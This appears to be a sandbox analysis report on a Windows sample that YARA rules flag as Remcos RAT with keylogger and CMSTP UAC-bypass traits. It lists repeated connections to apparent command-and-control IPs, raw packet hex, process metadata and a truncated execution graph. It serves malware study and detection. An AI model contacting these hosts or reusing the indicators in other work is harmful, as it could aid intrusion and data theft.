                                                Oct 29, 2024 16:51:38.730106115 CET545285000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:38.730890036 CET5452955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:38.735833883 CET500054528101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:38.736469030 CET5500054529101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:38.736557007 CET5452955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:38.736783981 CET5452955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:38.742572069 CET5500054529101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:47.221513033 CET5500054529101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:47.221631050 CET5452955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:47.221662045 CET5452955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:47.223228931 CET5453055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:47.227108955 CET5500054529101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:47.228842974 CET5505554530101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:47.229161024 CET5453055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:47.232686996 CET5453055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:47.238003016 CET5505554530101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:55.713044882 CET5505554530101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:55.713141918 CET5453055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:55.713227987 CET5453055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:51:55.713865995 CET5453180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:55.721164942 CET5505554530101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:51:55.721219063 CET8054531103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:51:55.721317053 CET5453180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:55.725255013 CET5453180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:51:55.730601072 CET8054531103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:04.214715958 CET8054531103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:04.217084885 CET5453180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:04.217154980 CET5453180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:04.221065998 CET545328080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:04.222573996 CET8054531103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:04.229684114 CET808054532103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:04.233680964 CET545328080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:04.233966112 CET545328080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:04.239563942 CET808054532103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:12.721340895 CET808054532103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:12.721494913 CET545328080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:12.721535921 CET545328080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:52:12.723035097 CET545338080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:12.727057934 CET808054532103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:52:12.728467941 CET80805453365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:12.728564978 CET545338080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:12.728863955 CET545338080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:12.734570980 CET80805453365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:21.209325075 CET80805453365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:21.209404945 CET545338080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:21.209609985 CET545338080192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:21.210407972 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:21.214939117 CET80805453365.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:21.215749025 CET805453465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:21.215816975 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:21.219650984 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:21.224976063 CET805453465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:22.074572086 CET805453465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:22.077760935 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:22.077804089 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:22.083192110 CET805453465.21.245.7192.168.2.4
                                                Oct 29, 2024 16:52:22.085697889 CET5453480192.168.2.465.21.245.7
                                                Oct 29, 2024 16:52:23.082699060 CET5453580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:23.088295937 CET8054535101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:23.088363886 CET5453580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:23.091650963 CET5453580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:23.097045898 CET8054535101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:31.565030098 CET8054535101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:31.567827940 CET5453580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:31.579787970 CET5453580192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:31.585141897 CET8054535101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:31.590540886 CET545368080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:31.595904112 CET808054536101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:31.597842932 CET545368080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:31.602991104 CET545368080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:31.608437061 CET808054536101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.081083059 CET808054536101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.081772089 CET545368080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.088466883 CET545368080192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.093832970 CET808054536101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.114214897 CET545374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.119894981 CET489954537101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.119987965 CET545374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.128695965 CET545374899192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.134881973 CET489954537101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.138509035 CET489954537101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.140496016 CET545385000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.145936012 CET500054538101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:40.149795055 CET545385000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.151593924 CET545385000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:40.158827066 CET500054538101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:48.638277054 CET500054538101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:48.640832901 CET545385000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:48.643291950 CET545385000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:48.648650885 CET500054538101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:48.650990009 CET5453955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:48.656311989 CET5500054539101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:48.656393051 CET5453955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:48.658785105 CET5453955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:48.664720058 CET5500054539101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:57.146181107 CET5500054539101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:57.146240950 CET5453955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:57.146296024 CET5453955000192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:57.147025108 CET5454055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:57.151839972 CET5500054539101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:57.152934074 CET5505554540101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:52:57.153008938 CET5454055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:57.156343937 CET5454055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:52:57.161830902 CET5505554540101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:53:05.644757032 CET5505554540101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:53:05.647777081 CET5454055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:53:05.647835970 CET5454055055192.168.2.4101.99.93.169
                                                Oct 29, 2024 16:53:05.652251959 CET5454180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:05.653296947 CET5505554540101.99.93.169192.168.2.4
                                                Oct 29, 2024 16:53:05.657892942 CET8054541103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:53:05.660178900 CET5454180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:05.666301966 CET5454180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:05.671715975 CET8054541103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:53:14.148174047 CET8054541103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:53:14.149902105 CET5454180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:14.149903059 CET5454180192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:14.155287981 CET8054541103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:53:14.155534983 CET545428080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:14.161303043 CET808054542103.144.139.157192.168.2.4
                                                Oct 29, 2024 16:53:14.161775112 CET545428080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:14.162066936 CET545428080192.168.2.4103.144.139.157
                                                Oct 29, 2024 16:53:14.167598963 CET808054542103.144.139.157192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 29, 2024 16:49:54.996081114 CET5362950162.159.36.2192.168.2.4
                                                Oct 29, 2024 16:49:55.649672031 CET53571861.1.1.1192.168.2.4
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730101.99.93.169807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:49:09.799679041 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 1a 7d 98 6e 88 d5 73 85 16 38 00 60 39 78 92 ad 90 06 d0 4e 0b 27 2a db 88 a6 cf a4 31 e5 49 af 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 fc 9d ab b8 ed 98 c4 41 0b c7 82 06 6a 85 17 71 5e 88 1d
                                                Data Ascii: }ns8`9xN'*1Ir3GEAAjq^W"VN)k:*(IhnG cX+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.454242103.144.139.157807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:50:00.921581984 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 9e 70 61 04 93 eb 22 34 b3 92 b9 8d b7 01 59 e0 db b3 42 a7 b5 8b 8e 54 6f b9 bc c2 52 d8 3d 4b 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 80 e1 62 26 46 0f cf ef 08 d3 56 75 18 21 04 19 32 4b 0f
                                                Data Ascii: pa"4YBToR=Kr3GEAb&FVu!2KYv)A7S5_[uj]~@1<z~g6"+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.45433465.21.245.7807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:50:26.517108917 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 ec 1b 4c c2 79 75 f6 fe bd ef e1 06 75 20 e6 99 d1 ce a3 e7 e6 c2 0a a5 02 55 cb 93 87 45 42 d6 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 88 68 dc 21 1e 16 b8 fc 45 dd 3f a2 a8 7f fd 63 da 0f cd
                                                Data Ascii: Lyuu UEBr3GEAh!E?ccIHk>j7wqsJH%y[p!e+
                                                Oct 29, 2024 16:50:27.379667997 CET505INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html; charset=us-ascii
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Tue, 29 Oct 2024 15:50:26 GMT
                                                Connection: close
                                                Content-Length: 326
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>
                                                Oct 29, 2024 16:50:27.383706093 CET7OUTData Raw: 15 03 03 00 02 02 46
                                                Data Ascii: F


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.454345101.99.93.169807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:50:28.407064915 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 82 72 02 b1 61 36 64 a3 da d3 e7 8b 5e d7 0c 47 fa 8a 4f 23 ea b4 61 06 c3 60 ca d6 29 78 ab 3a 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 05 05 f2 6e 2b cf 6f 8c 68 55 c0 73 92 89 be 77 b1 a3 d4
                                                Data Ascii: ra6d^GO#a`)x:r3GEAn+ohUsw7;JU%ip&BC(&.u@CA*+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.454521103.144.139.157807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:51:02.410634041 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 f5 05 31 f0 13 cd a8 9a 04 8b 69 5a ed f1 aa 6e a6 19 89 60 33 c5 9c bf 58 25 be d6 8d 5f d3 95 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 45 1c 7d 8f 57 5f aa f9 6e 86 0c 68 9e 8d 4d 9a 59 4c 77
                                                Data Ascii: 1iZn`3X%_r3GEAE}W_nhMYLwxK#r._#t'"R[/rd/a`}+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.45452465.21.245.7807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:51:11.279213905 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 4a c6 1e 27 05 2b 5a 94 56 59 95 0f 98 22 46 45 c1 99 4e d5 65 dd af 7f 46 1c 71 32 f0 c5 67 81 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 fd b8 e5 35 50 e9 ae 2d 12 32 6c ef 82 f9 a9 8c 59 65 ff
                                                Data Ascii: J'+ZVY"FENeFq2gr3GEA5P-2lYey7LP33>BWY?c7N7_.s+
                                                Oct 29, 2024 16:51:12.129440069 CET505INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html; charset=us-ascii
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Tue, 29 Oct 2024 15:51:10 GMT
                                                Connection: close
                                                Content-Length: 326
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>
                                                Oct 29, 2024 16:51:12.129616976 CET7OUTData Raw: 15 03 03 00 02 02 46
                                                Data Ascii: F


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.454525101.99.93.169807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:51:13.191734076 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 ff 93 39 0a 82 b4 ec 8d 69 ce ff 31 3a 39 ba 7b 8a b8 23 a0 0f fb 0d e7 f5 f4 81 6e e0 9f 67 1f 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 1a 01 7f 0a c0 e1 18 d7 6f 07 42 21 2d 50 c5 32 23 e0 ad
                                                Data Ascii: 9i1:9{#ngr3GEAoB!-P2#N[~=rB,9l'*-?P+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.454531103.144.139.157807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:51:55.725255013 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 6a 74 f1 f5 fe 17 63 4b 24 af 38 15 1c 0a d6 48 1b df cb 86 56 4e 58 de 64 a4 92 f5 2f c8 34 53 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 ab 2f c8 69 9f 05 4f df b2 9e 75 83 24 52 70 b4 75 a2 18
                                                Data Ascii: jtcK$8HVNXd/4Sr3GEA/iOu$RpuBwwj3v5JVWw@\Z6X+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.45453465.21.245.7807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:52:21.219650984 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 78 66 98 06 d3 ee 62 d8 84 35 e4 9e 60 4d 7c aa cc 78 78 e3 14 46 14 76 0f 02 e3 bb d2 56 9d 1a 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 5d 47 2d f2 5d c3 aa d4 79 14 08 cf 55 a4 d4 75 c9 28 53
                                                Data Ascii: xfb5`M|xxFvVr3GEA]G-]yUu(S6U-|)+MUUYml]""7+
                                                Oct 29, 2024 16:52:22.074572086 CET505INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html; charset=us-ascii
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Tue, 29 Oct 2024 15:52:21 GMT
                                                Connection: close
                                                Content-Length: 326
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>
                                                Oct 29, 2024 16:52:22.077760935 CET7OUTData Raw: 15 03 03 00 02 02 46
                                                Data Ascii: F


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.454535101.99.93.169807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:52:23.091650963 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 13 13 bc 7c c1 fb 11 f6 25 e2 36 9f d7 7a 6e a1 cb 52 94 25 04 e9 89 e2 b0 77 30 cd fc ab 87 ac 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 aa 62 1f e4 fc c1 5d cc f8 62 73 90 a0 1f 34 be 50 a5 74
                                                Data Ascii: |%6znR%w0r3GEAb]bs4PtN)PeWqJ-Q<A 38?m(@9R+


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.454541103.144.139.157807560C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 29, 2024 16:53:05.666301966 CET166OUTData Raw: 16 03 03 00 a1 01 00 00 9d 03 03 62 ff 8a c8 f8 9a 8e 43 d8 fd f6 67 0a d3 ed 51 8c 62 db 7f 06 90 98 08 60 ff 60 a5 15 e0 4d c7 00 00 02 13 01 01 00 00 72 00 33 00 47 00 45 00 17 00 41 04 ba f5 26 f6 98 7e da 47 35 d4 96 d8 52 2c ef d7 1b d4 d4
                                                Data Ascii: bCgQb``Mr3GEA&~G5R,1a-R<dCNWE66%+


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Target ID:0
                                                Start time:11:49:08
                                                Start date:29/10/2024
                                                Path:C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\FPPhfkcDCh.exe"
                                                Imagebase:0x400000
                                                File size:495'104 bytes
                                                MD5 hash:C9312AA42F69CC66491124567E969F24
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:4.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:22.1%
                                                  Total number of Nodes:1321
                                                  Total number of Limit Nodes:56
                                                  execution_graph 46547 4437fd 46548 443806 46547->46548 46549 44381f 46547->46549 46550 44380e 46548->46550 46554 443885 46548->46554 46552 443816 46552->46550 46565 443b52 22 API calls 2 library calls 46552->46565 46555 443891 46554->46555 46556 44388e 46554->46556 46566 44f45d GetEnvironmentStringsW 46555->46566 46556->46552 46561 4438a9 46574 446802 20 API calls __dosmaperr 46561->46574 46562 4438d3 46562->46552 46564 44389e 46575 446802 20 API calls __dosmaperr 46564->46575 46565->46549 46567 44f471 46566->46567 46568 443898 46566->46568 46576 4461b8 46567->46576 46568->46564 46573 4439aa 26 API calls 3 library calls 46568->46573 46571 44f485 ctype 46583 446802 20 API calls __dosmaperr 46571->46583 46572 44f49f FreeEnvironmentStringsW 46572->46568 46573->46561 46574->46564 46575->46562 46577 4461f6 46576->46577 46581 4461c6 ___crtLCMapStringA 46576->46581 46585 44062d 20 API calls __dosmaperr 46577->46585 46578 4461e1 RtlAllocateHeap 46580 4461f4 46578->46580 46578->46581 46580->46571 46581->46577 46581->46578 46584 443001 7 API calls 2 library calls 46581->46584 46583->46572 46584->46581 46585->46580 46586 43bea8 46589 43beb4 _swprintf ___DestructExceptionObject 46586->46589 46587 43bec2 46602 44062d 20 API calls __dosmaperr 46587->46602 46589->46587 46590 43beec 46589->46590 46597 445909 EnterCriticalSection 46590->46597 46592 43bec7 ___DestructExceptionObject __cftoe 46593 43bef7 46598 43bf98 46593->46598 46597->46593 46600 43bfa6 46598->46600 46599 